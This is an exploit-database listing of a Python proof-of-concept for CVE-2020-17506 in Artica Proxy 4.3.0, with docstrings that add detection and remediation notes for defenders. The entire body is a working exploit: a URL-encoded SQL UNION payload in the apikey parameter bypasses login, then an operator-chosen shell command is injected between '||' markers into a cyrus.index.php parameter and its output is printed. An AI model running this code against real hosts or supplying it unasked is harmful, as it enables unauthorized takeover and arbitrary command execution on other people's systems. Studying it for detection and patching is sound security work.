
packetstorm | Dan Duffy | PACKETSTORM:158868
History: Aug 14, 2020 - 12:00 a.m.

Artica Proxy 4.3.0 Authentication Bypass

2020-08-14 00:00:00
Dan Duffy
packetstormsecurity.com
129
`# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass  
# Google Dork: N/A  
# Date: 2020-08-13  
# Exploit Author: Dan Duffy  
# Vendor Homepage: http://articatech.net/  
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes  
# Version: 4.30.00000000 (REQUIRED)  
# Tested on: Debian  
# CVE : CVE-2020-17506  
  
import requests  
import argparse  
from bs4 import BeautifulSoup  
  
  
def bypass_auth(session, args):
    """Send the one unauthenticated request that CVE-2020-17506 relies on.

    The request is a GET to ``/fw.login.php`` whose ``apikey`` query value is
    a URL-encoded ``' UNION select 1,'<base64>';`` fragment.  On affected
    Artica Proxy builds that parameter reaches a SQL query unescaped, so the
    query returns the row supplied in the request instead of a stored API key.
    The base64 column appears to decode to a PHP-serialized array carrying a
    ``uid`` of ``-100`` -- NOTE(review): confirm against the vendor advisory.

    Review notes for defenders:
      * The response is never inspected, so the "[+] Bypassing" message says
        nothing about whether the target was actually vulnerable.
      * Any ``apikey`` value on ``/fw.login.php`` containing a quote,
        ``UNION`` or ``select`` is a high-signal entry in web-server or
        reverse-proxy logs.
      * The root cause is string-built SQL; the durable fix is the vendor
        update, with request filtering only as a stop-gap.
      * ``verify=False`` turns off TLS certificate validation for the call.

    Args:
        session: object exposing ``get(url, verify=...)``; ``main`` passes a
            ``requests.Session``.
        args: namespace whose ``host`` attribute is the base URL
            (``https://host:port``).

    Returns:
        The same ``session`` object that was passed in.
    """
    injected_apikey = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
    login_path = "/fw.login.php?apikey="

    print("[+] Bypassing authentication...")
    request_url = args.host + login_path + injected_apikey
    session.get(request_url, verify=False)
    return session
  
  
def run_command(session, args):
    """POST the operator-supplied command string and print the echoed output.

    The request goes to ``/cyrus.index.php`` with the command placed between
    ``||`` markers in the ``service-cmds-peform`` query parameter, reusing
    whatever cookies ``session`` already holds.  The HTML reply is parsed and
    the text of the second ``<code>`` element is printed.

    Review notes for defenders:
      * ``args.command`` is inserted into the URL as-is (no URL encoding).
      * ``find_all("code")[1]`` raises ``IndexError`` when the page has fewer
        than two ``<code>`` elements, e.g. on a patched or unrelated host.
      * In access logs, a POST to ``/cyrus.index.php`` whose
        ``service-cmds-peform`` value contains ``||`` shortly after a GET to
        ``/fw.login.php`` with an unusual ``apikey`` is the trace this script
        leaves.
      * ``verify=False`` turns off TLS certificate validation for the call.

    Args:
        session: object exposing ``post(url, verify=...)``.
        args: namespace with ``host`` (base URL) and ``command`` attributes.
    """
    command = args.command
    cmd_endpoint = f"/cyrus.index.php?service-cmds-peform=||{command}||"
    print(f"[+] Running command: {command}")

    page_html = session.post(args.host + cmd_endpoint, verify=False).text
    code_elements = BeautifulSoup(page_html, "html.parser").find_all("code")
    print(code_elements[1].get_text())
  
  
def main():
    """Parse ``--host`` and ``--command`` and run the two PoC stages in order.

    If either option is missing or empty, the usage text is printed and the
    process exits with status 0.  Otherwise a fresh ``requests.Session`` is
    passed to ``bypass_auth`` and then to ``run_command``, so any cookies set
    by the first request are sent with the second.
    """
    cli = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
    cli.add_argument(
        "--host",
        help="The host to target. Format example: https://host:port",
    )
    cli.add_argument("--command", help="The command to run")
    opts = cli.parse_args()

    # Both options are mandatory even though argparse does not enforce it.
    if not (opts.host and opts.command):
        cli.print_help()
        exit(0)

    http_session = bypass_auth(requests.Session(), opts)
    run_command(http_session, opts)
  
  
# Run the PoC only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()
`